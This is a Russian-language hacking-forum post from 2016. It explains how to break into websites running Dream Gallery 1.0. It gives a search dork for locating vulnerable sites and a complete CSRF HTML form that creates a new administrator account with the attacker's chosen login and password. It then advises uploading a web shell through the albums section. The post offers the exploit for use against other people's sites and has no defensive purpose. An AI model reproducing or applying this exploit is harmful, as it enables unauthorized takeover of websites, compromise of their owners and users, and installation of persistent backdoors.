1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Dream Gallery баг

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем DarkKnight, 27 июн 2016.

  1. TopicStarter Overlay
    DarkKnight

    DarkKnight

    Регистрация:
    1 июн 2016
    Сообщения:
    126
    Симпатии:
    144
    В скрипте Dream Gallery 1.0 найдено уязвимость CSRF - Add Admin
    Т.е можно в админке создать нового админа
    Дорк: "Design by Rafael Clares"
    В найденных сайта ищем админку.
    site.ru/admin
    Как только найдем сайта с админкой можно приступить к взлому
    Открываем блокнот и пишем такой код
    Код:
    <html>
    <bOdy>
       <form method="post" action="http://site.ru/admin/usuario.php?action=incluir">
          <input type="hidden" name="user_login" value="darkknight">
          <input type="hidden" name="user_password" type="hidden" value="parol" >
          <input type="hidden" name="user_email" value="">
          <input type="submit" value="
    	
    hack">
    </form>
    </bOdy>
    </html>
    тут darkknight будет логин админа
    parol - пароль админа
    site.ru - тут меняем только домен у которого мы нашли админку
    сохраняем как html и запускаем в браузере
    После того как нажимаем кнопку hack мы попадаем в админку сайта
    там будет надпись Hey Dude!
    После этого можно спокойно зайти в раздел albums и загрузить туда шелл
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...